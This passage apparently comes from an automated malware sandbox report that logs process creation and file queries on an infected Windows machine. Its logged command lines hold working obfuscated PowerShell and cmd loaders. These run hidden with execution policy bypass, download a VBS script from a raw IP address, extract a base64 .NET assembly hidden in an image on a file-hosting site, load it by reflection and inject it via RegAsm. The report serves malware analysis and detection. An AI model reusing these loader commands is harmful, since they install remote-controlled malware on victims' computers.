MzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES15CB.tmp" "c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwnkycgpsankyd7mh1odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8ymdi0mtavrgv0ywhob3qnkydlx1yuanbnihswftt7mx13zwjdjysnbgllbnqgpsbojysnzxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltjysnywdlqnl0zxmgpsb7mx13zwjdbgllbnqnkycurg93bmxvywreyxrhkhsxfwltywdlvscrj3jsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllqnkydlehqujysnrw5jb2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7jysnmx1zdgfydezsywcgpsb7mh08jysnpejbu0u2nf9tvefsvd4+ezb9jysno3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwltywdlvgv4dc4nkydjbmrlee9mkhsxfwvuzezsywcpo3sxfxn0yxj0sw5kzxggjysnlwdlidaglwfuzcb7mx0nkydlbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7eycrjzf9ymenkydzzty0tgvuz3roid0gezenkyd9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvziccrjz0gw1n5cycrj3rlbs5db252zxj0xto6rnjvjysnbujhc2u2nfmnkyd0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0nkycuumvmbgvjdglvbi5bc3nlbwjsjysnev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkknkydudm9rzsh7mx1udwxslcbakhswfxr4dc5ir0ddulivmdmzlza0ljaymi4zlji5ms8vjysnonb0dgh7mh0sihswfwrlc2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mh0siccrj3swfwrlcycrj2f0axzhzg97mh0sihswfvjlz0fzbxswfswgezb9zgvzyxrpdmfkb3snkycwfswgezb9zgvzyxrpdmfkb3swfskpoycpicatribbq2hhcl0zosxbq2hhcl0znil8igludm9rzs1lehbyzxntsw9u';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot'+'e_v.jpg {0};{1}webc'+'lient = n'+'ew-object system.net.webclient;{1}im'+'agebytes = {1}webclient'+'.downloaddata({1}imageu'+'rl);{1}imagetext = [system.t'+'ext.'+'encoding]::utf8.getstring({1}imagebytes);{'+'1}startflag = {0}<'+'<base64_start>>{0}'+';{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}imagetext.'+'indexof({1}endflag);{1}startindex '+'-ge 0 -and {1}'+'endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{'+'1}ba'+'se64length = {1'+'}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes '+'= [sys'+'tem.convert]::fro'+'mbase64s'+'tring({1}base64command);{1}loadedassembly = [system'+'.reflection.assembl'+'y]::load({1}commandbytes);{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.i'+'nvoke({1}null, @({0}txt.hggcrr/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}regasm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -f [char]39,[char]36)\| invoke-expression"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwnkycgpsankyd7mh1odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8ymdi0mtavrgv0ywhob3qnkydlx1yuanbnihswftt7mx13zwjdjysnbgllbnqgpsbojysnzxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltjysnywdlqnl0zxmgpsb7mx13zwjdbgllbnqnkycurg93bmxvywreyxrhkhsxfwltywdlvscrj3jsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllqnkydlehqujysnrw5jb2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7jysnmx1zdgfydezsywcgpsb7mh08jysnpejbu0u2nf9tvefsvd4+ezb9jysno3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwltywdlvgv4dc4nkydjbmrlee9mkhsxfwvuzezsywcpo3sxfxn0yxj0sw5kzxggjysnlwdlidaglwfuzcb7mx0nkydlbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7eycrjzf9ymenkydzzty0tgvuz3roid0gezenkyd9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvziccrjz0gw1n5cycrj3rlbs5db252zxj0xto6rnjvjysnbujhc2u2nfmnkyd0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0nkycuumvmbgvjdglvbi5bc3nlbwjsjysnev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkknkydudm9rzsh7mx1udwxslcbakhswfxr4dc5ir0ddulivmdmzlza0ljaymi4zlji5ms8vjysnonb0dgh7mh0sihswfwrlc2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mh0siccrj3swfwrlcycrj2f0axzhzg97mh0sihswfvjlz0fzbxswfswgezb9zgvzyxrpdmfkb3snkycwfswgezb9zgvzyxrpdmfkb3swfskpoycpicatribbq2hhcl0zosxbq2hhcl0znil8igludm9rzs1lehbyzxntsw9u';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot'+'e_v.jpg {0};{1}webc'+'lient = n'+'ew-object system.net.webclient;{1}im'+'agebytes = {1}webclient'+'.downloaddata({1}imageu'+'rl);{1}imagetext = [system.t'+'ext.'+'encoding]::utf8.getstring({1}imagebytes);{'+'1}startflag = {0}<'+'<base64_start>>{0}'+';{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}imagetext.'+'indexof({1}endflag);{1}startindex '+'-ge 0 -and {1}'+'endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{'+'1}ba'+'se64length = {1'+'}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes '+'= [sys'+'tem.convert]::fro'+'mbase64s'+'tring({1}base64command);{1}loadedassembly = [system'+'.reflection.assembl'+'y]::load({1}commandbytes);{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.i'+'nvoke({1}null, @({0}txt.hggcrr/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}regasm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -f [char]39,[char]36)\| invoke-expression"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
